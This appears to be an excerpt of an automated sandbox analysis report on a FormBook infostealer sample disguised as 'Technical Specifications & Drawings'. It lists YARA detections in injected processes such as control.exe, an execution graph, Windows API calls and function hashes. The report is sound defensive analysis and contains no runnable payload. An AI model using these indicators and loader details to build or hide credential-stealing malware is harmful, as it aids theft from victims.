                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:19
                                                Start time:12:27:54
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0x1c0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:12.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:2.6%
                                                  Total number of Nodes:190
                                                  Total number of Limit Nodes:8
                                                  execution_graph 24241 d8d01c 24242 d8d034 24241->24242 24243 d8d08e 24242->24243 24248 28e0adf 24242->24248 24253 28e0af0 24242->24253 24258 28e17e8 24242->24258 24262 28e17dc 24242->24262 24249 28e0ae4 24248->24249 24251 28e17dc CallWindowProcW 24249->24251 24252 28e17e8 CallWindowProcW 24249->24252 24250 28e0b37 24250->24243 24251->24250 24252->24250 24254 28e0b16 24253->24254 24256 28e17dc CallWindowProcW 24254->24256 24257 28e17e8 CallWindowProcW 24254->24257 24255 28e0b37 24255->24243 24256->24255 24257->24255 24259 28e1815 24258->24259 24260 28e1847 24259->24260 24266 28e1970 24259->24266 24263 28e17e2 24262->24263 24264 28e1847 24263->24264 24265 28e1970 CallWindowProcW 24263->24265 24265->24264 24268 28e1984 24266->24268 24267 28e1a10 24267->24260 24270 28e1a28 24268->24270 24271 28e1a39 24270->24271 24273 28e2ec1 24270->24273 24271->24267 24274 28e2ed0 24273->24274 24274->24271 24275 28e2f8a CallWindowProcW 24274->24275 24276 28e2f39 24274->24276 24275->24276 24276->24271 24287 28e6c38 24288 28e6c65 24287->24288 24295 28e6678 24288->24295 24290 28e6d04 24291 28e6678 5 API calls 24290->24291 24292 28e6e3c 24291->24292 24293 28e6678 5 API calls 24292->24293 24294 28e6f36 24293->24294 24296 28e6683 24295->24296 24300 e77947 24296->24300 24307 e76f88 24296->24307 24297 28e9194 24297->24290 24301 e77955 24300->24301 24303 e77bfe 24301->24303 24314 28e9340 24301->24314 24318 28e9350 24301->24318 24302 e77c3c 24302->24297 24303->24302 24322 e7bf10 24303->24322 24308 e76f93 24307->24308 24310 e77bfe 24308->24310 24311 28e9340 3 API calls 24308->24311 24312 28e9350 3 API calls 24308->24312 24309 e77c3c 24309->24297 24310->24309 24313 e7bf10 5 API calls 24310->24313 24311->24310 24312->24310 24313->24309 24327 e79ef8 24314->24327 24335 e79f08 24314->24335 24315 28e935e 24315->24303 24319 28e935e 24318->24319 24320 e79ef8 2 API calls 24318->24320 24321 e79f08 2 API calls 24318->24321 24319->24303 24320->24319 24321->24319 24323 e7bf18 24322->24323 24324 e7bf02 24323->24324 24355 e7c0d0 24323->24355 24359 e7c08d 24323->24359 24324->24302 24328 e79efc 24327->24328 24329 e79f33 24328->24329 24343 e7a181 24328->24343 24347 e7a190 24328->24347 24329->24315 24330 e7a130 GetModuleHandleW 24332 e7a15d 24330->24332 24331 e79f2b 24331->24329 24331->24330 24332->24315 24336 e79f0a 24335->24336 24337 e79f33 24336->24337 24341 e7a181 LoadLibraryExW 24336->24341 24342 e7a190 LoadLibraryExW 24336->24342 24337->24315 24338 e7a130 GetModuleHandleW 24340 e7a15d 24338->24340 24339 e79f2b 24339->24337 24339->24338 24340->24315 24341->24339 24342->24339 24344 e7a184 24343->24344 24345 e7a1c9 24344->24345 24351 e79468 24344->24351 24345->24331 24348 e7a1a4 24347->24348 24349 e79468 LoadLibraryExW 24348->24349 24350 e7a1c9 24348->24350 24349->24350 24350->24331 24352 e7a370 LoadLibraryExW 24351->24352 24354 e7a3e9 24352->24354 24354->24345 24356 e7c0dd 24355->24356 24357 e7c117 24356->24357 24363 e7b594 24356->24363 24357->24324 24360 e7c0a3 24359->24360 24360->24324 24361 e7c117 24360->24361 24362 e7b594 5 API calls 24360->24362 24361->24324 24362->24361 24364 e7b59f 24363->24364 24366 e7ca08 24364->24366 24367 e7b67c 24364->24367 24366->24366 24368 e7b687 24367->24368 24369 e76f88 5 API calls 24368->24369 24370 e7ce77 24369->24370 24374 e7e808 24370->24374 24382 e7e7f0 24370->24382 24371 e7ceb0 24371->24366 24375 e7e80a 24374->24375 24376 e7e845 24375->24376 24377 e7e885 24375->24377 24395 e7f077 24375->24395 24400 e7f088 24375->24400 24376->24371 24403 e7fa41 24377->24403 24408 e7fa50 24377->24408 24383 e7e7da 24382->24383 24384 e7e7fa 24382->24384 24383->24371 24385 e7e879 24384->24385 24387 e7e802 24384->24387 24389 e7f077 2 API calls 24385->24389 24390 e7f088 2 API calls 24385->24390 24386 e7e885 24393 e7fa41 2 API calls 24386->24393 24394 e7fa50 2 API calls 24386->24394 24387->24386 24388 e7e845 24387->24388 24391 e7f077 2 API calls 24387->24391 24392 e7f088 2 API calls 24387->24392 24388->24371 24389->24386 24390->24386 24391->24386 24392->24386 24393->24388 24394->24388 24396 e7f07b 24395->24396 24399 e7f0f1 24395->24399 24397 e79f08 2 API calls 24396->24397 24398 e7f091 24396->24398 24397->24398 24398->24377 24399->24377 24401 e79f08 2 API calls 24400->24401 24402 e7f091 24401->24402 24402->24377 24404 e7fa4c 24403->24404 24405 e7fb21 24404->24405 24413 28e084f 24404->24413 24418 28e08e8 24404->24418 24409 e7fa7a 24408->24409 24410 e7fb21 24409->24410 24411 28e084f 2 API calls 24409->24411 24412 28e08e8 2 API calls 24409->24412 24411->24410 24412->24410 24414 28e0864 24413->24414 24415 28e091d 24414->24415 24422 28e092c 24414->24422 24426 28e0938 24414->24426 24415->24405 24420 28e092c CreateWindowExW 24418->24420 24421 28e0938 CreateWindowExW 24418->24421 24419 28e091d 24419->24405 24420->24419 24421->24419 24423 28e0938 CreateWindowExW 24422->24423 24425 28e0a5c 24423->24425 24425->24425 24427 28e09a0 CreateWindowExW 24426->24427 24429 28e0a5c 24427->24429 24430 e740d0 24431 e740e2 24430->24431 24432 e740ee 24431->24432 24436 e741e0 24431->24436 24441 e7388c 24432->24441 24434 e7410d 24437 e741e4 24436->24437 24445 e742d1 24437->24445 24449 e742e0 24437->24449 24442 e73897 24441->24442 24457 e75b4c 24442->24457 24444 e771fa 24444->24434 24447 e742d4 24445->24447 24446 e743e4 24447->24446 24453 e73e18 24447->24453 24451 e74307 24449->24451 24450 e743e4 24450->24450 24451->24450 24452 e73e18 CreateActCtxA 24451->24452 24452->24450 24454 e75370 CreateActCtxA 24453->24454 24456 e75433 24454->24456 24458 e75b57 24457->24458 24461 e76f28 24458->24461 24460 e7731d 24460->24444 24462 e76f33 24461->24462 24465 e76f58 24462->24465 24464 e773fa 24464->24460 24466 e76f63 24465->24466 24467 e76f88 5 API calls 24466->24467 24468 e774ea 24467->24468 24468->24464 24469 e7c410 DuplicateHandle 24470 e7c4a6 24469->24470 24471 e79e10 24472 e79e12 24471->24472 24474 e79ef8 2 API calls 24472->24474 24475 e79f08 2 API calls 24472->24475 24473 e79e1f 24474->24473 24475->24473 24277 28e0b80 SetWindowLongW 24278 28e0bec 24277->24278 24279 e7c1e8 GetCurrentProcess 24280 e7c262 GetCurrentThread 24279->24280 24281 e7c25b 24279->24281 24282 e7c29f GetCurrentProcess 24280->24282 24283 e7c298 24280->24283 24281->24280 24286 e7c2d5 24282->24286 24283->24282 24284 e7c2fd GetCurrentThreadId 24285 e7c32e 24284->24285 24286->24284

                                                  Executed Functions

                                                  Function 028E0C40 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 41 28e0c40-28e0c9e 46 28e0cef-28e0cfd 41->46 47 28e0ca0-28e0ce9 41->47 48 28e0d05-28e0d0d 46->48 47->46 57 28e0f1b-28e0f3c 47->57 100 28e0d12 call 28e0f5c 48->100 101 28e0d12 call 28e0f78 48->101 50 28e0d18-28e0d26 54 28e0d2c-28e0d4b 50->54 55 28e0ea3-28e0eca 50->55 63 28e0d53-28e0d55 54->63 66 28e0ecf-28e0ef2 55->66 69 28e0ef4-28e0ef7 57->69 67 28e0d5e-28e0dc2 63->67 66->69 83 28e0dc8-28e0dfd 67->83 84 28e0e79-28e0e80 67->84 72 28e0efb-28e0f44 69->72 78 28e0f4e 72->78 79 28e0f46 72->79 79->78 83->84 91 28e0dff-28e0e31 83->91 84->72 85 28e0e82-28e0ea1 84->85 85->66 91->84 96 28e0e33-28e0e74 call 28e0b50 91->96 96->84 100->50 101->50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$L
                                                  • API String ID: 0-166189556
                                                  • Opcode ID: c23c34ffefe7d33f61fb2bcd889f52305f1037eec05aa282b2edde6dbb1b6fc6
                                                  • Instruction ID: be948d7efc05183e9ee80597594dd9002c1ad06e2021faec7068aecc13cd32c3
                                                  • Opcode Fuzzy Hash: c23c34ffefe7d33f61fb2bcd889f52305f1037eec05aa282b2edde6dbb1b6fc6
                                                  • Instruction Fuzzy Hash: F6918138E103198FCF04DFB0D8949EDB7B6EF8A304F548615E416BB2A4EB74A945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E0C10 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 102 28e0c10-28e0c1a 103 28e0c1e-28e0c9e 102->103 104 28e0c1c 102->104 110 28e0cef-28e0d0d 103->110 111 28e0ca0-28e0ce9 103->111 104->103 164 28e0d12 call 28e0f5c 110->164 165 28e0d12 call 28e0f78 110->165 111->110 121 28e0f1b-28e0f3c 111->121 114 28e0d18-28e0d26 118 28e0d2c-28e0d55 114->118 119 28e0ea3-28e0eca 114->119 131 28e0d5e-28e0dc2 118->131 130 28e0ecf-28e0ef2 119->130 133 28e0ef4-28e0ef7 121->133 130->133 147 28e0dc8-28e0dfd 131->147 148 28e0e79-28e0e80 131->148 136 28e0efb-28e0f44 133->136 142 28e0f4e 136->142 143 28e0f46 136->143 143->142 147->148 155 28e0dff-28e0e31 147->155 148->136 149 28e0e82-28e0ea1 148->149 149->130 155->148 160 28e0e33-28e0e74 call 28e0b50 155->160 160->148 164->114 165->114
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L$L
                                                  • API String ID: 0-166189556
                                                  • Opcode ID: 1de040b6abda872c33045f55f7e2d7ded326345dc507dd489ae45c730b881ac5
                                                  • Instruction ID: 23aa07bb2ad47d079052f7ba1c4aa77cc8b1f4f465c4901a585918092bf2781b
                                                  • Opcode Fuzzy Hash: 1de040b6abda872c33045f55f7e2d7ded326345dc507dd489ae45c730b881ac5
                                                  • Instruction Fuzzy Hash: BF91B239D103498FCB05DFB0C8949DDBBB6FF8A300F548655E416AF2A1EB74A855CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7F077 Relevance: .2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d296a8202d2288ee1c8fa091365611dc57dd61837233aa41eda552af91702cf5
                                                  • Instruction ID: ef8416ca9d578e65a74431fd576a426a7592b8a65399e59ef9191414435be79e
                                                  • Opcode Fuzzy Hash: d296a8202d2288ee1c8fa091365611dc57dd61837233aa41eda552af91702cf5
                                                  • Instruction Fuzzy Hash: 2DC129B9E917468BD710DF65E8881893FE1BB65328FD0CA0BD1616BAD0D7B4106ECF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7C1DB Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C248
                                                  • GetCurrentThread.KERNEL32 ref: 00E7C285
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C2C2
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E7C31B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 75f5f7e55d9881bd08d65f2fcb849341de1f6269140dded3f686dff5d51f5fc1
                                                  • Instruction ID: 70b51c02b361a9306617fe3ab6aa3c84a2a01201fe6ed7d62ddf4b0d07070bfb
                                                  • Opcode Fuzzy Hash: 75f5f7e55d9881bd08d65f2fcb849341de1f6269140dded3f686dff5d51f5fc1
                                                  • Instruction Fuzzy Hash: 825154B4D006888FDB10CFA9C5487DEBBF4AF48318F24C499E409B77A1D7745988CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E7C1E8 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 21 e7c1e8-e7c259 GetCurrentProcess 22 e7c262-e7c296 GetCurrentThread 21->22 23 e7c25b-e7c261 21->23 24 e7c29f-e7c2d3 GetCurrentProcess 22->24 25 e7c298-e7c29e 22->25 23->22 26 e7c2d5-e7c2db 24->26 27 e7c2dc-e7c2f4 24->27 25->24 26->27 39 e7c2f7 call e7c398 27->39 40 e7c2f7 call e7c788 27->40 31 e7c2fd-e7c32c GetCurrentThreadId 32 e7c335-e7c397 31->32 33 e7c32e-e7c334 31->33 33->32 39->31 40->31
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C248
                                                  • GetCurrentThread.KERNEL32 ref: 00E7C285
                                                  • GetCurrentProcess.KERNEL32 ref: 00E7C2C2
                                                  • GetCurrentThreadId.KERNEL32 ref: 00E7C31B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 18b5086663d54558b7f85b79d806dbf9fbc32143d7b6139cee3662094583a523
                                                  • Instruction ID: 3d9cc9ea4726309c407041dd0478670b1cfc32aeb2546b46419b7fb3cd129fb5
                                                  • Opcode Fuzzy Hash: 18b5086663d54558b7f85b79d806dbf9fbc32143d7b6139cee3662094583a523
                                                  • Instruction Fuzzy Hash: 155143B4D006488FDB10CFA9D548BDEBBF5AB88318F24C459E409B77A0D7746988CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E79F08 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1120 e79f08-e79f1d call e782a8 1124 e79f33-e79f37 1120->1124 1125 e79f1f 1120->1125 1126 e79f4b-e79f8c 1124->1126 1127 e79f39-e79f43 1124->1127 1175 e79f25 call e7a181 1125->1175 1176 e79f25 call e7a190 1125->1176 1132 e79f8e-e79f96 1126->1132 1133 e79f99-e79fa7 1126->1133 1127->1126 1128 e79f2b-e79f2d 1128->1124 1130 e7a068-e7a128 1128->1130 1170 e7a130-e7a15b GetModuleHandleW 1130->1170 1171 e7a12a-e7a12d 1130->1171 1132->1133 1134 e79fcb-e79fcd 1133->1134 1135 e79fa9-e79fae 1133->1135 1137 e79fd0-e79fd7 1134->1137 1138 e79fb0-e79fb7 call e79410 1135->1138 1139 e79fb9 1135->1139 1142 e79fe4-e79feb 1137->1142 1143 e79fd9-e79fe1 1137->1143 1140 e79fbb-e79fc9 1138->1140 1139->1140 1140->1137 1146 e79fed-e79ff5 1142->1146 1147 e79ff8-e7a001 call e79420 1142->1147 1143->1142 1146->1147 1151 e7a003-e7a00b 1147->1151 1152 e7a00e-e7a013 1147->1152 1151->1152 1154 e7a015-e7a01c 1152->1154 1155 e7a031-e7a035 1152->1155 1154->1155 1157 e7a01e-e7a02e call e79430 call e79440 1154->1157 1159 e7a03b-e7a03e 1155->1159 1157->1155 1162 e7a061-e7a067 1159->1162 1163 e7a040-e7a05e 1159->1163 1163->1162 1172 e7a164-e7a178 1170->1172 1173 e7a15d-e7a163 1170->1173 1171->1170 1173->1172 1175->1128 1176->1128
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f9a9c766cf0a91fd830ec8c6bf0307b42bffbfe4f2d1b1ded67f6df6d2a9f88e
                                                  • Instruction ID: 4066dfb69bdf63304c60888323960c987a2efe8a9f7af97b532e5eff17a068d8
                                                  • Opcode Fuzzy Hash: f9a9c766cf0a91fd830ec8c6bf0307b42bffbfe4f2d1b1ded67f6df6d2a9f88e
                                                  • Instruction Fuzzy Hash: A0712670A00B058FD724DF69D04579AB7F1BF88308F04892DE44AE7B51EB74E84ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E092C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1177 28e092c-28e099e 1179 28e09a9-28e09b0 1177->1179 1180 28e09a0-28e09a6 1177->1180 1181 28e09bb-28e0a5a CreateWindowExW 1179->1181 1182 28e09b2-28e09b8 1179->1182 1180->1179 1184 28e0a5c-28e0a62 1181->1184 1185 28e0a63-28e0a9b 1181->1185 1182->1181 1184->1185 1189 28e0a9d-28e0aa0 1185->1189 1190 28e0aa8 1185->1190 1189->1190 1191 28e0aa9 1190->1191 1191->1191
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028E0A4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 08a04d12a283323a4eb99115b97c2443f7c1a07da276ba611170417222f6f86d
                                                  • Instruction ID: 98105c686545a9833e89fb972e95017f9e95c5a7f27e9dbf8013728dc989affb
                                                  • Opcode Fuzzy Hash: 08a04d12a283323a4eb99115b97c2443f7c1a07da276ba611170417222f6f86d
                                                  • Instruction Fuzzy Hash: 6151EEB5D003489FDF14CFA9C884ADEBBB5BF49314F24852AE819AB210D7B49885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E0938 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1192 28e0938-28e099e 1193 28e09a9-28e09b0 1192->1193 1194 28e09a0-28e09a6 1192->1194 1195 28e09bb-28e0a5a CreateWindowExW 1193->1195 1196 28e09b2-28e09b8 1193->1196 1194->1193 1198 28e0a5c-28e0a62 1195->1198 1199 28e0a63-28e0a9b 1195->1199 1196->1195 1198->1199 1203 28e0a9d-28e0aa0 1199->1203 1204 28e0aa8 1199->1204 1203->1204 1205 28e0aa9 1204->1205 1205->1205
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028E0A4A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: afa7781a375c51962520e889834051e79fe2fc8430b18fb8ba239e743850aaaf
                                                  • Instruction ID: a02366e34ae3a106669d460ae0425af8805f762757f8634d0238e1e348218c03
                                                  • Opcode Fuzzy Hash: afa7781a375c51962520e889834051e79fe2fc8430b18fb8ba239e743850aaaf
                                                  • Instruction Fuzzy Hash: 2B41C0B5D00309DFDF14CF99C884ADEBBB5BF48314F24852AE819AB210D7B49885CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E75364 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1206 e75364-e7536a 1207 e7536e-e75431 CreateActCtxA 1206->1207 1208 e7536c 1206->1208 1210 e75433-e75439 1207->1210 1211 e7543a-e75494 1207->1211 1208->1207 1210->1211 1218 e75496-e75499 1211->1218 1219 e754a3-e754a7 1211->1219 1218->1219 1220 e754a9-e754b5 1219->1220 1221 e754b8 1219->1221 1220->1221 1223 e754b9 1221->1223 1223->1223
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00E75421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: d4af7c121d38c9824cf06a7ffb7d6f92006ee0c53a632af448470ae2d72fad5f
                                                  • Instruction ID: 33b662183b30fb915c02890e6ab22c81c8e993ab3f8622e871e701242c6e974e
                                                  • Opcode Fuzzy Hash: d4af7c121d38c9824cf06a7ffb7d6f92006ee0c53a632af448470ae2d72fad5f
                                                  • Instruction Fuzzy Hash: B7410371D00628CFDB24CFA9C8447CEBBB5BF44308F20805AD419BB255EBB56989CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E73E18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1224 e73e18-e75431 CreateActCtxA 1227 e75433-e75439 1224->1227 1228 e7543a-e75494 1224->1228 1227->1228 1235 e75496-e75499 1228->1235 1236 e754a3-e754a7 1228->1236 1235->1236 1237 e754a9-e754b5 1236->1237 1238 e754b8 1236->1238 1237->1238 1240 e754b9 1238->1240 1240->1240
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00E75421
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263113012.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e70000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: f45c5eef004912b699a47f36dbb92769aaf2c24589e105e768265e4e65f7f85c
                                                  • Instruction ID: d4238b958d03face314d641b62e7ce01b557cd377b5248dc1f555fe75561d8e7
                                                  • Opcode Fuzzy Hash: f45c5eef004912b699a47f36dbb92769aaf2c24589e105e768265e4e65f7f85c
                                                  • Instruction Fuzzy Hash: 6941D271D00628CBDB24DFA9C8447CEBBB5BF48308F608059D419BB255EBB56989CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 028E2EF0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1241 28e2ef0-28e2f2c 1242 28e2fdc-28e2ffc 1241->1242 1243 28e2f32-28e2f37 1241->1243 1250 28e2fff-28e300c 1242->1250 1244 28e2f8a-28e2fc2 CallWindowProcW 1243->1244 1245 28e2f39-28e2f70 1243->1245 1246 28e2fcb-28e2fda 1244->1246 1247 28e2fc4-28e2fca 1244->1247 1252 28e2f79-28e2f88 1245->1252 1253 28e2f72-28e2f78 1245->1253 1246->1250 1247->1246 1252->1250 1253->1252
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 028E2FB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263681394.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_28e0000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: e749eab69fbb015e5a1676010fcf2c792aefb70b251e5375efb6c5b10963b6fc
                                                  • Instruction ID: 50dae67c8c3df72d58b6b4d184c967b051988fb763b49e9a2736fe8ebe138605
                                                  • Opcode Fuzzy Hash: e749eab69fbb015e5a1676010fcf2c792aefb70b251e5375efb6c5b10963b6fc
                                                  • Instruction Fuzzy Hash: 7B4138B8A002058FDB14CF99C448B9ABBF9FF89314F14C558E91AAB725D370A845CFA1
